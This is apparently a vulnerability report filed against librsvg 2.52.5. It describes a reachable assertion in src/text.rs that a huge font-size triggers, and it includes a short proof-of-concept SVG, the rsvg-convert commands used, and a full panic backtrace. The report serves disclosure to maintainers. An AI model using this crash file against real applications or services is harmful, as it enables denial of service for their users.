Panic when using a too-big font-size
hi
report vulnerability
Issue Summary
In 2.52.5, the stable version distributed on ubuntu22, the process is terminated due to large font size when processing svg files.
The vulnerability occurs in the assert!(h >= 0.0); code in src/text.rs:359. Since the font size can be controlled by an attacker, this is a 'Reachable assertion'.
An attacker can prove the poc by using a large value for the font size inside the <g> tag of the svg file.
Any application that uses a vulnerable version of the librsvg package may be affected. I observed that other applications using version 2.52.5 terminated.
This can prove it using the rsvg-convert tool provided when building librsvg version 2.52.5, and also the Image Viewer does not execute normally and terminates.
It can lead to DoS
Example SVG
<?xml version="1.0"?>
<svg width="200" height="300">
<g style="font-size:1e7px;">
<text>A</text>
</g>
</svg>
- and attach the file poc poc
Librsvg Version
- librsvg 2.52.5
$ ./rsvg-convert -v
rsvg-convert version 2.52.5
$ apt search librsvg2
Sorting... Done
Full Text Search... Done
librsvg2-2/jammy,now 2.52.5+dfsg-3 amd64 [installed,automatic]
SAX-based renderer library for SVG files (runtime)
librsvg2-common/jammy,now 2.52.5+dfsg-3 amd64 [installed,automatic]
SAX-based renderer library for SVG files (extra runtime)
librsvg2-dev/jammy,now 2.52.5+dfsg-3 amd64 [installed]
SAX-based renderer library for SVG files (development)
- The rsvg-convert tool is created by building the 2.52.5 source in gitlab.
Platform
- Tested in Ubuntu 22
Additional logs
- normal execute
$ ./rsvg-convert poc
(process:3460): Pango-WARNING **: 01:06:26.068: failed to create cairo scaled font, expect ugly output. the offending font is 'Liberation Serif 2097151.9990234375'
(process:3460): Pango-WARNING **: 01:06:26.068: font_face status is: error occurred in libfreetype
(process:3460): Pango-WARNING **: 01:06:26.068: scaled_font status is: error occurred in libfreetype
thread 'main' panicked at 'assertion failed: h >= 0.0', src/text.rs:359:9
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
- with RUST_BACKTRACE=1
$ RUST_BACKTRACE=1 ./rsvg-convert poc
(process:2559): Pango-WARNING **: 06:46:24.377: failed to create cairo scaled font, expect ugly output. the offending font is 'Liberation Serif 2097151.9990234375'
(process:2559): Pango-WARNING **: 06:46:24.378: font_face status is: error occurred in libfreetype
(process:2559): Pango-WARNING **: 06:46:24.378: scaled_font status is: error occurred in libfreetype
thread 'main' panicked at 'assertion failed: h >= 0.0', src/text.rs:359:9
stack backtrace:
0: rust_begin_unwind
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/std/src/panicking.rs:575:5
1: core::panicking::panic_fmt
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/panicking.rs:64:14
2: core::panicking::panic
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/panicking.rs:114:5
3: librsvg::text::MeasuredSpan::from_span
at ./src/text.rs:359:9
4: librsvg::text::MeasuredChunk::from_chunk::{{closure}}
at ./src/text.rs:141:25
5: core::iter::adapters::map::map_fold::{{closure}}
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/adapters/map.rs:84:28
6: core::iter::traits::iterator::Iterator::fold
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:2438:21
7: <core::iter::adapters::map::Map<I,F> as core::iter::traits::iterator::Iterator>::fold
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/adapters/map.rs:124:9
8: core::iter::traits::iterator::Iterator::for_each
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:837:9
9: alloc::vec::Vec<T,A>::extend_trusted
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/mod.rs:2856:17
10: <alloc::vec::Vec<T,A> as alloc::vec::spec_extend::SpecExtend<T,I>>::spec_extend
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_extend.rs:26:9
11: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter_nested::SpecFromIterNested<T,I>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_from_iter_nested.rs:62:9
12: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter::SpecFromIter<T,I>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_from_iter.rs:33:9
13: <alloc::vec::Vec<T> as core::iter::traits::collect::FromIterator<T>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/mod.rs:2724:9
14: core::iter::traits::iterator::Iterator::collect
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:1860:9
15: librsvg::text::MeasuredChunk::from_chunk
at ./src/text.rs:138:53
16: <librsvg::text::Text as librsvg::element::Draw>::draw::{{closure}}
at ./src/text.rs:774:42
17: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
18: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
19: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
20: <librsvg::text::Text as librsvg::element::Draw>::draw
at ./src/text.rs:753:9
21: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
22: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
23: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
24: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
25: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw_children
at ./src/node.rs:331:30
26: <librsvg::structure::Group as librsvg::element::Draw>::draw::{{closure}}
at ./src/structure.rs:46:39
27: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
28: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
29: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
30: <librsvg::structure::Group as librsvg::element::Draw>::draw
at ./src/structure.rs:40:9
31: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
32: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
33: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
34: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
35: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw_children
at ./src/node.rs:331:30
36: <librsvg::structure::Svg as librsvg::element::Draw>::draw::{{closure}}
at ./src/structure.rs:281:17
37: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
38: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
39: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
40: <librsvg::structure::Svg as librsvg::element::Draw>::draw
at ./src/structure.rs:273:9
41: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
42: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
43: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
44: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
45: librsvg::drawing_ctx::draw_tree
at ./src/drawing_ctx.rs:252:24
46: librsvg::handle::Handle::render_layer::{{closure}}
at ./src/handle.rs:250:13
47: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
48: librsvg::handle::Handle::render_layer
at ./src/handle.rs:249:9
49: librsvg::handle::Handle::render_document
at ./src/handle.rs:230:9
50: librsvg::api::CairoRenderer::render_document
at ./src/api.rs:398:9
51: rsvg_convert::Surface::render
at ./src/bin/rsvg-convert.rs:314:21
52: rsvg_convert::Converter::convert
at ./src/bin/rsvg-convert.rs:650:13
53: rsvg_convert::main::{{closure}}
at ./src/bin/rsvg-convert.rs:1132:55
54: core::result::Result<T,E>::and_then
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/result.rs:1371:22
55: rsvg_convert::main
at ./src/bin/rsvg-convert.rs:1132:21
56: core::ops::function::FnOnce::call_once
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/ops/function.rs:250:5
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
=================================================================
Edited by thKim0